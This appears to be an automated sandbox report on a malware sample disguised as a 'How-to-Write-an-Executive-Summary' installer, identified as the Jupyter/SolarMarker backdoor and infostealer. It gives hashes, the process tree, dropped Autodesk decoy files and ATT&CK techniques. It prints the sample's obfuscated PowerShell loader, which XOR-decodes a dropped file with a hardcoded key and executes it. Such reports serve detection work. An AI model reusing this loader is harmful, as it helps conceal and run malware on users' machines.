jupyter | ad9b05f44392fa14fb8d8473dc4ad0fd309d51769cd6f7208f087478c84a0e23

Analysis

max time kernel
152s
max time network
154s
platform
windows10-2004_x64
resource
win10v2004-20231130-en
resource tags

arch:x64arch:x86image:win10v2004-20231130-enlocale:en-usos:windows10-2004-x64system
submitted
08-12-2023 00:49

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

uploads/ntfs/%5C%5C.%5CC%3A/Users/RSturm/Downloads/How-to-Write-an-Executive-Summary.exe
Size

307.8MB
MD5

70d800fff565ff61a5939ce9d68f9fd0
SHA1

4307197a42bed4983d62b60e47fc49ccad12e9bb
SHA256

15b1673b69a09679af01392fc16e19d8c899f310fa6cfe062cdf8020fd572993
SHA512

3e1dada60db411cf6522be878f87fc92943a0bec50918784c1229e6eac46841aafc0864f954e4d9c39b70fe37fece91f543c3ca6e596cec12c00eb48d814746c
SSDEEP

393216:K0wdub0PsZT46G6wKyQmpQDTzqqrlnVr54FwIjug4zn:K0wc9HwGmpU3nV+uHfD

Score

10^/10

jupyter backdoor stealer trojan

Malware Config

Signatures

Jupyter, SolarMarker
Jupyter is a backdoor and infostealer first seen in mid 2020.
backdoor trojan stealer jupyter

Blocklisted process makes network request 1 IoCs

flow	pid	Process
345	4820	powershell.exe

Downloads MZ/PE file

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3936660601-1848837011-2142350499-1000\Control Panel\International\Geo\Nation	How-to-Write-an-Executive-Summary.tmp

Executes dropped EXE 33 IoCs

pid	Process
2352	How-to-Write-an-Executive-Summary.tmp
4760	PLC0000037_2024_WIN64.exe
548	AdOdisDeployTool.exe
2780	DownloadManager.exe
3240	ADPClientService.exe
2972	7za.exe
4740	7za.exe
2484	7za.exe
2204	7za.exe
4188	7za.exe
3016	7za.exe
2784	7za.exe
3048	7za.exe
4208	7za.exe
2396	7za.exe
5092	7za.exe
4824	7za.exe
3152	7za.exe
3952	7za.exe
3552	7za.exe
4084	7za.exe
3816	7za.exe
624	7za.exe
1716	7za.exe
4420	7za.exe
840	7za.exe
4344	7za.exe
2628	7za.exe
1476	7za.exe
1052	7za.exe
1168	7za.exe
4104	7za.exe
4424	7za.exe

Loads dropped DLL 21 IoCs

pid	Process
2352	How-to-Write-an-Executive-Summary.tmp
2352	How-to-Write-an-Executive-Summary.tmp
548	AdOdisDeployTool.exe
548	AdOdisDeployTool.exe
548	AdOdisDeployTool.exe
548	AdOdisDeployTool.exe
548	AdOdisDeployTool.exe
548	AdOdisDeployTool.exe
548	AdOdisDeployTool.exe
548	AdOdisDeployTool.exe
548	AdOdisDeployTool.exe
548	AdOdisDeployTool.exe
548	AdOdisDeployTool.exe
548	AdOdisDeployTool.exe
548	AdOdisDeployTool.exe
548	AdOdisDeployTool.exe
548	AdOdisDeployTool.exe
548	AdOdisDeployTool.exe
548	AdOdisDeployTool.exe
548	AdOdisDeployTool.exe
548	AdOdisDeployTool.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
548	AdOdisDeployTool.exe

Suspicious behavior: EnumeratesProcesses 55 IoCs

pid	Process
4820	powershell.exe
4820	powershell.exe
4820	powershell.exe
2780	DownloadManager.exe
2780	DownloadManager.exe
2780	DownloadManager.exe
2780	DownloadManager.exe
2780	DownloadManager.exe
2780	DownloadManager.exe
2780	DownloadManager.exe
2780	DownloadManager.exe
2780	DownloadManager.exe
2780	DownloadManager.exe
2780	DownloadManager.exe
2780	DownloadManager.exe
2780	DownloadManager.exe
2780	DownloadManager.exe
2780	DownloadManager.exe
2780	DownloadManager.exe
2780	DownloadManager.exe
2780	DownloadManager.exe
2780	DownloadManager.exe
2780	DownloadManager.exe
2780	DownloadManager.exe
2780	DownloadManager.exe
2780	DownloadManager.exe
2780	DownloadManager.exe
2780	DownloadManager.exe
2780	DownloadManager.exe
2780	DownloadManager.exe
2780	DownloadManager.exe
2780	DownloadManager.exe
2780	DownloadManager.exe
2780	DownloadManager.exe
2780	DownloadManager.exe
2780	DownloadManager.exe
2780	DownloadManager.exe
2780	DownloadManager.exe
2780	DownloadManager.exe
2780	DownloadManager.exe
2780	DownloadManager.exe
2780	DownloadManager.exe
2780	DownloadManager.exe
2780	DownloadManager.exe
2780	DownloadManager.exe
2780	DownloadManager.exe
2780	DownloadManager.exe
2780	DownloadManager.exe
2780	DownloadManager.exe
2780	DownloadManager.exe
2780	DownloadManager.exe
2780	DownloadManager.exe
2780	DownloadManager.exe
2780	DownloadManager.exe
2780	DownloadManager.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4820	powershell.exe
Token: SeRestorePrivilege	2972	7za.exe
Token: 35	2972	7za.exe
Token: SeSecurityPrivilege	2972	7za.exe
Token: SeSecurityPrivilege	2972	7za.exe
Token: SeRestorePrivilege	4740	7za.exe
Token: 35	4740	7za.exe
Token: SeSecurityPrivilege	4740	7za.exe
Token: SeSecurityPrivilege	4740	7za.exe
Token: SeRestorePrivilege	2204	7za.exe
Token: 35	2204	7za.exe
Token: SeSecurityPrivilege	2204	7za.exe
Token: SeRestorePrivilege	2484	7za.exe
Token: 35	2484	7za.exe
Token: SeSecurityPrivilege	2484	7za.exe
Token: SeSecurityPrivilege	2484	7za.exe
Token: SeRestorePrivilege	4188	7za.exe
Token: 35	4188	7za.exe
Token: SeSecurityPrivilege	4188	7za.exe
Token: SeSecurityPrivilege	4188	7za.exe
Token: SeRestorePrivilege	3016	7za.exe
Token: 35	3016	7za.exe
Token: SeSecurityPrivilege	3016	7za.exe
Token: SeRestorePrivilege	3048	7za.exe
Token: 35	3048	7za.exe
Token: SeSecurityPrivilege	3048	7za.exe
Token: SeRestorePrivilege	2784	7za.exe
Token: 35	2784	7za.exe
Token: SeSecurityPrivilege	2784	7za.exe
Token: SeSecurityPrivilege	2784	7za.exe
Token: SeRestorePrivilege	4208	7za.exe
Token: 35	4208	7za.exe
Token: SeSecurityPrivilege	4208	7za.exe
Token: SeSecurityPrivilege	4208	7za.exe
Token: SeRestorePrivilege	2396	7za.exe
Token: 35	2396	7za.exe
Token: SeSecurityPrivilege	2396	7za.exe
Token: SeRestorePrivilege	4824	7za.exe
Token: 35	4824	7za.exe
Token: SeRestorePrivilege	5092	7za.exe
Token: 35	5092	7za.exe
Token: SeSecurityPrivilege	4824	7za.exe
Token: SeSecurityPrivilege	5092	7za.exe
Token: SeSecurityPrivilege	5092	7za.exe
Token: SeRestorePrivilege	3152	7za.exe
Token: 35	3152	7za.exe
Token: SeSecurityPrivilege	3152	7za.exe
Token: SeSecurityPrivilege	3152	7za.exe
Token: SeRestorePrivilege	3952	7za.exe
Token: 35	3952	7za.exe
Token: SeSecurityPrivilege	3952	7za.exe
Token: SeSecurityPrivilege	3952	7za.exe
Token: SeRestorePrivilege	3552	7za.exe
Token: 35	3552	7za.exe
Token: SeSecurityPrivilege	3552	7za.exe
Token: SeRestorePrivilege	4084	7za.exe
Token: 35	4084	7za.exe
Token: SeSecurityPrivilege	4084	7za.exe
Token: SeSecurityPrivilege	4084	7za.exe
Token: SeRestorePrivilege	3816	7za.exe
Token: 35	3816	7za.exe
Token: SeSecurityPrivilege	3816	7za.exe
Token: SeRestorePrivilege	624	7za.exe
Token: 35	624	7za.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 5020 wrote to memory of 2352	5020	How-to-Write-an-Executive-Summary.exe	92
PID 5020 wrote to memory of 2352	5020	How-to-Write-an-Executive-Summary.exe	92
PID 5020 wrote to memory of 2352	5020	How-to-Write-an-Executive-Summary.exe	92
PID 2352 wrote to memory of 4760	2352	How-to-Write-an-Executive-Summary.tmp	97
PID 2352 wrote to memory of 4760	2352	How-to-Write-an-Executive-Summary.tmp	97
PID 2352 wrote to memory of 4760	2352	How-to-Write-an-Executive-Summary.tmp	97
PID 2352 wrote to memory of 4820	2352	How-to-Write-an-Executive-Summary.tmp	98
PID 2352 wrote to memory of 4820	2352	How-to-Write-an-Executive-Summary.tmp	98
PID 2352 wrote to memory of 4820	2352	How-to-Write-an-Executive-Summary.tmp	98
PID 4760 wrote to memory of 548	4760	PLC0000037_2024_WIN64.exe	100
PID 4760 wrote to memory of 548	4760	PLC0000037_2024_WIN64.exe	100
PID 548 wrote to memory of 2780	548	AdOdisDeployTool.exe	102
PID 548 wrote to memory of 2780	548	AdOdisDeployTool.exe	102
PID 548 wrote to memory of 3240	548	AdOdisDeployTool.exe	104
PID 548 wrote to memory of 3240	548	AdOdisDeployTool.exe	104
PID 548 wrote to memory of 2972	548	AdOdisDeployTool.exe	107
PID 548 wrote to memory of 2972	548	AdOdisDeployTool.exe	107
PID 548 wrote to memory of 2972	548	AdOdisDeployTool.exe	107
PID 2780 wrote to memory of 4740	2780	DownloadManager.exe	113
PID 2780 wrote to memory of 4740	2780	DownloadManager.exe	113
PID 2780 wrote to memory of 4740	2780	DownloadManager.exe	113
PID 2780 wrote to memory of 2484	2780	DownloadManager.exe	114
PID 2780 wrote to memory of 2484	2780	DownloadManager.exe	114
PID 2780 wrote to memory of 2484	2780	DownloadManager.exe	114
PID 2780 wrote to memory of 2204	2780	DownloadManager.exe	115
PID 2780 wrote to memory of 2204	2780	DownloadManager.exe	115
PID 2780 wrote to memory of 2204	2780	DownloadManager.exe	115
PID 2780 wrote to memory of 4188	2780	DownloadManager.exe	116
PID 2780 wrote to memory of 4188	2780	DownloadManager.exe	116
PID 2780 wrote to memory of 4188	2780	DownloadManager.exe	116
PID 2780 wrote to memory of 3016	2780	DownloadManager.exe	117
PID 2780 wrote to memory of 3016	2780	DownloadManager.exe	117
PID 2780 wrote to memory of 3016	2780	DownloadManager.exe	117
PID 2780 wrote to memory of 2784	2780	DownloadManager.exe	119
PID 2780 wrote to memory of 2784	2780	DownloadManager.exe	119
PID 2780 wrote to memory of 2784	2780	DownloadManager.exe	119
PID 2780 wrote to memory of 3048	2780	DownloadManager.exe	118
PID 2780 wrote to memory of 3048	2780	DownloadManager.exe	118
PID 2780 wrote to memory of 3048	2780	DownloadManager.exe	118
PID 2780 wrote to memory of 4208	2780	DownloadManager.exe	121
PID 2780 wrote to memory of 4208	2780	DownloadManager.exe	121
PID 2780 wrote to memory of 4208	2780	DownloadManager.exe	121
PID 2780 wrote to memory of 2396	2780	DownloadManager.exe	120
PID 2780 wrote to memory of 2396	2780	DownloadManager.exe	120
PID 2780 wrote to memory of 2396	2780	DownloadManager.exe	120
PID 2780 wrote to memory of 5092	2780	DownloadManager.exe	122
PID 2780 wrote to memory of 5092	2780	DownloadManager.exe	122
PID 2780 wrote to memory of 5092	2780	DownloadManager.exe	122
PID 2780 wrote to memory of 4824	2780	DownloadManager.exe	123
PID 2780 wrote to memory of 4824	2780	DownloadManager.exe	123
PID 2780 wrote to memory of 4824	2780	DownloadManager.exe	123
PID 2780 wrote to memory of 3152	2780	DownloadManager.exe	126
PID 2780 wrote to memory of 3152	2780	DownloadManager.exe	126
PID 2780 wrote to memory of 3152	2780	DownloadManager.exe	126
PID 2780 wrote to memory of 3952	2780	DownloadManager.exe	127
PID 2780 wrote to memory of 3952	2780	DownloadManager.exe	127
PID 2780 wrote to memory of 3952	2780	DownloadManager.exe	127
PID 2780 wrote to memory of 3552	2780	DownloadManager.exe	128
PID 2780 wrote to memory of 3552	2780	DownloadManager.exe	128
PID 2780 wrote to memory of 3552	2780	DownloadManager.exe	128
PID 2780 wrote to memory of 4084	2780	DownloadManager.exe	132
PID 2780 wrote to memory of 4084	2780	DownloadManager.exe	132
PID 2780 wrote to memory of 4084	2780	DownloadManager.exe	132
PID 2780 wrote to memory of 3816	2780	DownloadManager.exe	131

C:\Users\Admin\AppData\Local\Temp\uploads\ntfs\%5C%5C.%5CC%3A\Users\RSturm\Downloads\How-to-Write-an-Executive-Summary.exe
"C:\Users\Admin\AppData\Local\Temp\uploads\ntfs\%5C%5C.%5CC%3A\Users\RSturm\Downloads\How-to-Write-an-Executive-Summary.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:5020
- C:\Users\Admin\AppData\Local\Temp\is-OJ1AT.tmp\How-to-Write-an-Executive-Summary.tmp
  "C:\Users\Admin\AppData\Local\Temp\is-OJ1AT.tmp\How-to-Write-an-Executive-Summary.tmp" /SL5="$7006C,321879387,790016,C:\Users\Admin\AppData\Local\Temp\uploads\ntfs\%5C%5C.%5CC%3A\Users\RSturm\Downloads\How-to-Write-an-Executive-Summary.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:2352
- - C:\Users\Admin\AppData\Local\Temp\is-DPLDA.tmp\PLC0000037_2024_WIN64.exe
    "C:\Users\Admin\AppData\Local\Temp\is-DPLDA.tmp\PLC0000037_2024_WIN64.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:4760
  - - C:\Users\Admin\AppData\Local\Temp\7zS55C1.tmp\AdOdisDeployTool.exe
      .\AdOdisDeployTool.exe
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Suspicious behavior: AddClipboardFormatListener
      Suspicious use of WriteProcessMemory
      PID:548
    - - C:\Users\Admin\AppData\Local\Temp\7zS55C1.tmp\DownloadManager.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS55C1.tmp\DownloadManager.exe -e --productname "Autodesk Custom Install Setup" --productversion 1.43.0.3
        5⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:2780
      - C:\Users\Admin\AppData\Local\Temp\7zS55C1.tmp\7za.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS55C1.tmp/7za.exe" x -ttar "C:/Autodesk/WI/3050002208245123779/pkg.spatialreference0.tar" -aoa -bsp2 -o"C:\Users\Admin\Downloads/Autodesk\DWG TrueView 2024 - English - (EN)\image\PLC0000037_2024_en-US"
        6⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:4740
      - C:\Users\Admin\AppData\Local\Temp\7zS55C1.tmp\7za.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS55C1.tmp/7za.exe" x -txz "C:/Autodesk/WI/9207306946704321420/pkg.spatialreference1.tar.xz" -bsp2 -so
        6⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:2484
      - C:\Users\Admin\AppData\Local\Temp\7zS55C1.tmp\7za.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS55C1.tmp/7za.exe" x -ttar -si -aoa -bsp2 -o"C:\Users\Admin\Downloads/Autodesk\DWG TrueView 2024 - English - (EN)\image\PLC0000037_2024_en-US"
        6⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:2204
      - C:\Users\Admin\AppData\Local\Temp\7zS55C1.tmp\7za.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS55C1.tmp/7za.exe" x -txz "C:/Autodesk/WI/17316467854081705703/pkg.dwgviewr1.tar.xz" -bsp2 -so
        6⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:4188
      - C:\Users\Admin\AppData\Local\Temp\7zS55C1.tmp\7za.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS55C1.tmp/7za.exe" x -ttar -si -aoa -bsp2 -o"C:\Users\Admin\Downloads/Autodesk\DWG TrueView 2024 - English - (EN)\image\PLC0000037_2024_en-US"
        6⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:3016
      - C:\Users\Admin\AppData\Local\Temp\7zS55C1.tmp\7za.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS55C1.tmp/7za.exe" x -ttar -si -aoa -bsp2 -o"C:\Users\Admin\Downloads/Autodesk\DWG TrueView 2024 - English - (EN)\image\PLC0000037_2024_en-US"
        6⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:3048
      - C:\Users\Admin\AppData\Local\Temp\7zS55C1.tmp\7za.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS55C1.tmp/7za.exe" x -txz "C:/Autodesk/WI/7470299403190662285/app.dwgviewr.en-us.tar.xz" -bsp2 -so
        6⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:2784
      - C:\Users\Admin\AppData\Local\Temp\7zS55C1.tmp\7za.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS55C1.tmp/7za.exe" x -ttar -si -aoa -bsp2 -o"C:\Users\Admin\Downloads/Autodesk\DWG TrueView 2024 - English - (EN)\image\PLC0000037_2024_en-US"
        6⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:2396
      - C:\Users\Admin\AppData\Local\Temp\7zS55C1.tmp\7za.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS55C1.tmp/7za.exe" x -txz "C:/Autodesk/WI/15546974791209447543/setup.tar.xz" -bsp2 -so
        6⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:4208
      - C:\Users\Admin\AppData\Local\Temp\7zS55C1.tmp\7za.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS55C1.tmp/7za.exe" x -txz "C:/Autodesk/WI/6027631620771072146/pkg.aspnet60x64.tar.xz" -bsp2 -so
        6⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:5092
      - C:\Users\Admin\AppData\Local\Temp\7zS55C1.tmp\7za.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS55C1.tmp/7za.exe" x -ttar -si -aoa -bsp2 -o"C:\Users\Admin\Downloads/Autodesk\DWG TrueView 2024 - English - (EN)\image\PLC0000037_2024_en-US"
        6⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:4824
      - C:\Users\Admin\AppData\Local\Temp\7zS55C1.tmp\7za.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS55C1.tmp/7za.exe" x -ttar "C:/Autodesk/WI/10406766591433479998/pkg.dwgviewr0.tar" -aoa -bsp2 -o"C:\Users\Admin\Downloads/Autodesk\DWG TrueView 2024 - English - (EN)\image\PLC0000037_2024_en-US"
        6⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:3152
      - C:\Users\Admin\AppData\Local\Temp\7zS55C1.tmp\7za.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS55C1.tmp/7za.exe" x -txz "C:/Autodesk/WI/17203124707632753182/pkg.webview2.tar.xz" -bsp2 -so
        6⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:3952
      - C:\Users\Admin\AppData\Local\Temp\7zS55C1.tmp\7za.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS55C1.tmp/7za.exe" x -ttar -si -aoa -bsp2 -o"C:\Users\Admin\Downloads/Autodesk\DWG TrueView 2024 - English - (EN)\image\PLC0000037_2024_en-US"
        6⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:3552
      - C:\Users\Admin\AppData\Local\Temp\7zS55C1.tmp\7za.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS55C1.tmp/7za.exe" x -ttar -si -aoa -bsp2 -o"C:\Users\Admin\Downloads/Autodesk\DWG TrueView 2024 - English - (EN)\image\PLC0000037_2024_en-US"
        6⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:3816
      - C:\Users\Admin\AppData\Local\Temp\7zS55C1.tmp\7za.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS55C1.tmp/7za.exe" x -txz "C:/Autodesk/WI/6591676873568496870/pkg.vcredist2012x64upd4.tar.xz" -bsp2 -so
        6⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:4084
      - C:\Users\Admin\AppData\Local\Temp\7zS55C1.tmp\7za.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS55C1.tmp/7za.exe" x -txz "C:/Autodesk/WI/1494572948922085844/pkg.vcredist2012x86upd4.tar.xz" -bsp2 -so
        6⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:624
      - C:\Users\Admin\AppData\Local\Temp\7zS55C1.tmp\7za.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS55C1.tmp/7za.exe" x -ttar -si -aoa -bsp2 -o"C:\Users\Admin\Downloads/Autodesk\DWG TrueView 2024 - English - (EN)\image\PLC0000037_2024_en-US"
        6⤵
        Executes dropped EXE
        
        PID:1716
      - C:\Users\Admin\AppData\Local\Temp\7zS55C1.tmp\7za.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS55C1.tmp/7za.exe" x -ttar -si -aoa -bsp2 -o"C:\Users\Admin\Downloads/Autodesk\DWG TrueView 2024 - English - (EN)\image\PLC0000037_2024_en-US"
        6⤵
        Executes dropped EXE
        
        PID:840
      - C:\Users\Admin\AppData\Local\Temp\7zS55C1.tmp\7za.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS55C1.tmp/7za.exe" x -txz "C:/Autodesk/WI/1914357826858827933/pkg.vcredist2022x86.tar.xz" -bsp2 -so
        6⤵
        Executes dropped EXE
        
        PID:4420
      - C:\Users\Admin\AppData\Local\Temp\7zS55C1.tmp\7za.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS55C1.tmp/7za.exe" x -txz "C:/Autodesk/WI/3999043798214024207/pkg.vcredist2022x64.tar.xz" -bsp2 -so
        6⤵
        Executes dropped EXE
        
        PID:2628
      - C:\Users\Admin\AppData\Local\Temp\7zS55C1.tmp\7za.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS55C1.tmp/7za.exe" x -ttar -si -aoa -bsp2 -o"C:\Users\Admin\Downloads/Autodesk\DWG TrueView 2024 - English - (EN)\image\PLC0000037_2024_en-US"
        6⤵
        Executes dropped EXE
        
        PID:4344
      - C:\Users\Admin\AppData\Local\Temp\7zS55C1.tmp\7za.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS55C1.tmp/7za.exe" x -ttar -si -aoa -bsp2 -o"C:\Users\Admin\Downloads/Autodesk\DWG TrueView 2024 - English - (EN)\image\PLC0000037_2024_en-US"
        6⤵
        Executes dropped EXE
        
        PID:1052
      - C:\Users\Admin\AppData\Local\Temp\7zS55C1.tmp\7za.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS55C1.tmp/7za.exe" x -txz "C:/Autodesk/WI/2469690359634945771/pkg.dotnet48.tar.xz" -bsp2 -so
        6⤵
        Executes dropped EXE
        
        PID:1476
      - C:\Users\Admin\AppData\Local\Temp\7zS55C1.tmp\7za.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS55C1.tmp/7za.exe" x -txz "C:/Autodesk/WI/12932770935227688031/pkg.dotnet60.tar.xz" -bsp2 -so
        6⤵
        Executes dropped EXE
        
        PID:1168
      - C:\Users\Admin\AppData\Local\Temp\7zS55C1.tmp\7za.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS55C1.tmp/7za.exe" x -ttar -si -aoa -bsp2 -o"C:\Users\Admin\Downloads/Autodesk\DWG TrueView 2024 - English - (EN)\image\PLC0000037_2024_en-US"
        6⤵
        Executes dropped EXE
        
        PID:4104
    - - C:\Users\Admin\AppData\Local\Temp\7zS55C1.tmp\ADPClientService.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS55C1.tmp\ADPClientService.exe -f C:\Users\Admin\AppData\Roaming\Autodesk\ADPSDK\JSON
        5⤵
        Executes dropped EXE
        
        PID:3240
    - - C:\Users\Admin\AppData\Local\Temp\7zS55C1.tmp\7za.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS55C1.tmp\7za.exe" x "C:\Users\Admin\AppData\Local\Temp\b221-0ca9-0bba-6e7e" -y -o"C:\Users\Admin\AppData\Local\Temp\7zS55C1.tmp"
        5⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:2972
    - - C:\Users\Admin\AppData\Local\Temp\7zS55C1.tmp\7za.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS55C1.tmp\7za.exe" x "C:\Users\Admin\Downloads/Autodesk\DWG TrueView 2024 - English - (EN)\image\ODIS\win_bootstrap.7z" -y -o"C:\Users\Admin\Downloads/Autodesk\DWG TrueView 2024 - English - (EN)\image\PLC0000037_2024_en-US"
        5⤵
        Executes dropped EXE
        
        PID:4424
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -commANd "ieX([TExt.eNcOdIng]::utf8.gETStrIng((({$f=[iO.fiLE]::reADALlBYtES($aRGs[0]);(rM $ARgs[0]);REtUrn $f}.INVoKe('C:\USErs\ADmin\APPDATA\LocaL\TeMP\Is-dPldA.tMP\..\948e9b2653B31720068Bf6b8Ac2ECeca.TMP'))|%{$_ -bXOr 'wEdJjnyTevCVYcrxkUphsgGMKOWHoubl'[$K++%32]})))"
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4820

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Autodesk\WI\3530149154685966638\win_bootstrap.7z

Filesize
12.3MB

MD5
d48acf678c044d0775b2a3995f25b377

SHA1
ade263147266b9ef247b898a85a58764be0645ec

SHA256
90b7016ea3267f109a69648ee80fd39ee57de25cd1e59dfe869e58bea6137075

SHA512
d64ee4ff97347c32ba21bc254d373728e83e1e2ff643a24fdacee0a24e688fe14712772d2517de859a335581064b5815c333b69bb05732fa049e9f546a568f15

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS55C1.tmp\7za.exe

Filesize
882KB

MD5
967bda956cfe0f397eb214e3ffb4d594

SHA1
34914610acbb576a80a58c88e7261c8599a009e0

SHA256
ed2a80000fc4484ee381e70e6900a21a9acc7c113f40b75a3b38d1f42c9c35eb

SHA512
20f1fa50d71ad529ed1f2114279cd29e18af0df3f690a4878428d3fca040c91daebb116faabeebae8091168e735f539408d6ccf64ac747a71b3b6b1320dabbdc

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS55C1.tmp\7za.exe

Filesize
882KB

MD5
967bda956cfe0f397eb214e3ffb4d594

SHA1
34914610acbb576a80a58c88e7261c8599a009e0

SHA256
ed2a80000fc4484ee381e70e6900a21a9acc7c113f40b75a3b38d1f42c9c35eb

SHA512
20f1fa50d71ad529ed1f2114279cd29e18af0df3f690a4878428d3fca040c91daebb116faabeebae8091168e735f539408d6ccf64ac747a71b3b6b1320dabbdc

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS55C1.tmp\ADPClientService.exe

Filesize
1.6MB

MD5
1f265857caf372dfce45e2ee90c77a4d

SHA1
c5a42eb404eec69c4b7ea990aea899d2cacd4d3c

SHA256
b9cd0216d7e8f30c1ad2cd8a2ba78d5a44d60c85cc9f50137a4d2965e042465a

SHA512
272f2c9390ad5c1650552fb9bdb918c3579fed6b26b315d4bae5eb277db70684270ad7c72466b0abe237909e196e98c529d0b37627765e0ec2a5b53d15688588

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS55C1.tmp\ADPClientService.exe

Filesize
1.6MB

MD5
1f265857caf372dfce45e2ee90c77a4d

SHA1
c5a42eb404eec69c4b7ea990aea899d2cacd4d3c

SHA256
b9cd0216d7e8f30c1ad2cd8a2ba78d5a44d60c85cc9f50137a4d2965e042465a

SHA512
272f2c9390ad5c1650552fb9bdb918c3579fed6b26b315d4bae5eb277db70684270ad7c72466b0abe237909e196e98c529d0b37627765e0ec2a5b53d15688588

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS55C1.tmp\AdHttpLib.dll

Filesize
9.7MB

MD5
c27e2f23bf08f8a9cc2ddbcfcf659fc8

SHA1
dc25ab43d693a5dfac7b2b78f7252ae9805ed1f5

SHA256
3d12ac56d7141cbf986162c1451d89f5a4a76296d1512e8866f0b34dd1b8992a

SHA512
73e7d11ab491d3cd7409d5fd7761d53702cf96cd36b72b23b4b61a0041738b14a83a350c997cbdf13023f16d28afc6108feb894d6ff90367d1857dec58cd0e93

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS55C1.tmp\AdHttpLib.dll

Filesize
9.7MB

MD5
c27e2f23bf08f8a9cc2ddbcfcf659fc8

SHA1
dc25ab43d693a5dfac7b2b78f7252ae9805ed1f5

SHA256
3d12ac56d7141cbf986162c1451d89f5a4a76296d1512e8866f0b34dd1b8992a

SHA512
73e7d11ab491d3cd7409d5fd7761d53702cf96cd36b72b23b4b61a0041738b14a83a350c997cbdf13023f16d28afc6108feb894d6ff90367d1857dec58cd0e93

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS55C1.tmp\AdOdisDeployTool.exe

Filesize
1.4MB

MD5
a4bb5620c0cf5387398789730877b7dd

SHA1
e42adb5c8e355728b5b751f6e6dc2756d4d68c08

SHA256
2f2b71c03cac596f0d93aaeedd9976e64fb4f5f4d06dfdf336778f0fd3e3edc0

SHA512
b70e073d5db65cd5379aef0a18427854efae0437a9846f0ac63b3baf92483d8e13be17aaa005b608faba5b875164070c2bd340d51eac90a14b0e446da4952097

Download Submit
